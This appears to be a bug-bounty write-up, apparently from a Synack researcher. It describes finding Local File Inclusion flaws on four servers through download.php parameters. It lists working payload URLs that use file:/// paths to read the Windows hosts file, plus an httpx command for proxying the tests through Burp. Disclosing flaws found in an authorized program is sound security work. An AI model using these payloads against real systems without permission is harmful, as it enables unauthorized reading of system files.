Multiple Local File Inclusions Flaws

1 minute read

Brief Description

Multiple LFI flaws were discovered in a popular host target during QR which has been widely tested before, the web targets from the client were similar to the host targets which made easier the recon phase. In this case, four different servers were identified with the similar flaw through two parameters such as f and file. Therefore, the web targets and the host targets ended up having the same root cause of the flaw.

Reconnaissance Steps

By gathering endpoints that were reported before (see Local File Inclusion Write-Up) in analytics in the web targets, a list was gathered which contained the endpoints including the payloads for the LFI flaw as the following:

/player/download.php?f=file:///C:/WINDOWS/System32/drivers/etc/hosts /formacion/download.php?f=file:///C:/WINDOWS/System32/drivers/etc/hosts /testip/download.php?file=file:///C:/WINDOWS/System32/drivers/etc/hosts /telepresence/download.php?f=file:///C:/WINDOWS/System32/drivers/etc/hosts /santander/download.php?f=file:///C:/WINDOWS/System32/drivers/etc/hosts

Then, by using httpx and BurpSuite, I proceeded to test the endpoints with the vulnerable IPs to send the web traffic to BurpSuite to make a better proof of concept. The following httpx command was used.

httpx -l vulnerable-ips.txt -paths vulnerable-endpoints.txt --http-proxy=http://localhost:8080

picture

After sending the traffic through BurpSuite, this is how the proof of concept looked like which can verify the flaw by using two parameters in four different web servers among the endpoints.

picture

After sending the report, the VO accepted it winning the QR and added an extra on the reward 30%.

picture

Takeaways

For people on Synack, feel curious to test from web to host targets who may have a similar target name as they may have similar technology infrastructure which may allow you to discover similar flaws. Don’t forget to check analytics!

Updated:

Leave a comment